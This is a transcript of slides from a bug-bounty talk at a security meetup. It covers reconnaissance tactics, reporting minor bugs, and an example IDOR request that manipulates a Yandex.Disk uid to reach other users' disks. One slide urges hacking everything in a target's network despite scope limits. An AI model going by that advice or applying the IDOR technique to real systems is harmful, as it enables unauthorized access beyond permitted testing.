Security Meetup 22 октября. «When big brick wall becomes wooden fence» or «how to get 1kk...
-
Upload
mailru-group -
Category
Education
-
view
9.110 -
download
1
Transcript of Security Meetup 22 октября. «When big brick wall becomes wooden fence» or «how to get 1kk...
#securitymeetup
“When big brick wall becomes wooden fence” or “how to get 1kk on
the Bug Bounty”
#:whoami?
• Known as ‘isox’• Web penetration tester• QIWI CISO• Member of “hall-of-fames” (Yandex, Mail.ru,
Apple, and so on)• JBFC participant ^___^
Hungry nomads
• Disparate groups• Attacking every tower they see• Using equal techniques and weapons• Really meticulous• Clever and creative• You and I
Castle with gold
• Ready to pay tribute for every successful attack
• Got enermous territory surrounding it• Provides protection for their citizen• Takes care about it’s borders• Makes friendship with neighbors
Looking at the frontend
• Huge strong (fire)walls• Musketeers and howitzers• Moat with crocodiles• Perfect gate citizenship control• Flawless architecture
… gentlemans, what we are waiting for?
Common assault
• 10 days for one embossed brick• Taked notice that walls are really pregnable• 100 gold coins of income• Got tired and went home
I worked using Burp Suite with plugins for a week.
Why so bad?
• Most of us took weapons from the same blacksmith
• Studied martial arts in one academy• There is very little of “unique attack
techniques”• Unless you are black (magic) fan or can make a
dozen of «PP» tricks• All easy ways are already found
Just stats for one day and one vector
Let’s dot the i’s and cross the t’s
• We are not making “security research”• We are working for our own• We came here to hack em for money• We are legal whitehats
Bad advice №1
Illusion of good network aggregation
• It does not really matter where this RCE or SQLi will be
• Common case: injection in aux DB leads to main DB takeover thru datalink
• Do you really believe writing “don’t hack this domains” will stop anybody?
• Hack everything you can find in target AS
Sometimes like this
Or like that
Or even like “I just hacked this IP”
Bad advice №2
Rabbit’s are not only puff
• 50$ is 50$• “I’m too cool for clickjacking, self-xss, bad
crossdomain.xml, POODLE, bad CSP”…forget about it
• If it is security issue – report it• Availability of bruteforce is also security bug• Missing captcha too• Information disclosure absolutely
Sometimes $140
10 clickjacks == 1 XSS
Bad advice №3
Enterprise toys are expensive
• Nessus SC for enterprise costs a lot as example• Sometimes security team just can’t configure
it well• Or does not use it at all• Scan it, validate it, report it!
For very nice bugs like this
Quagga is a routing software suite, providing implementations of OSPFv2, OSPFv3, RIP v1 and v2, RIPng and BGP-4 for Unix platforms, particularly FreeBSD, Linux, Solaris and NetBSD.
Good advice №1
First2discover is first2pwn
• Find your target AS-es (radar.qrator.net as example)
• Find domains and regions (subbrute + google)
• Automate nmap for portscanning target AS
• Keep your eyes at the difference report
• Be the first bounty hunter to discover new service
Dev, test, debug…yummy!
Good advice №2
We are lazy
• RegEx for sanitizing “abG$2.###” is too lazy to write
• Huge frameworks and API’s are awesome• Just MD5 username and salt with IP, this will
be sessionid• Keep in mind that developers are humans too• Just imagine yourself at their place
Yandex.Disk case
• What we know: Our yandex id, 229857356• What we see in requests:
_model.0=tree&id.0=/disk• What we will try:
_model.0=tree&id.0=229857356:/disk• Profit. Access any disk by full URI just changing
it’s uid.
Good advice №3
Automate your ideas
• Don’t be lazy, write your own plugins• Automate every cool vector you can create• Automate even every good vector you can
find!• Your fuzzing and attacks must be uniq
Let’s try to find errors in a good way
Don’t take it all too serious
• Research new vulnerabilities• Don’t stop working hands on. Repeater is your
best friend.• Keep learning! It’s so much interesting you
don’t know!• Share information with bro’s• Money is nothing. Seriously.
Thanks :)
• @videns, u r a dick• @d0znpp for good parties• QIWI security team for a presented time to
write this slides• Mail.Ru for this great evening
Email party invitations at [email protected]
QIWI IS HIRING
• Security Expert in Application Security Team– Write to [email protected]
• Security Expert in Infrastructure Security Team– Write to [email protected]
• Python programmer in Internal Development– Write to [email protected]
• Welcome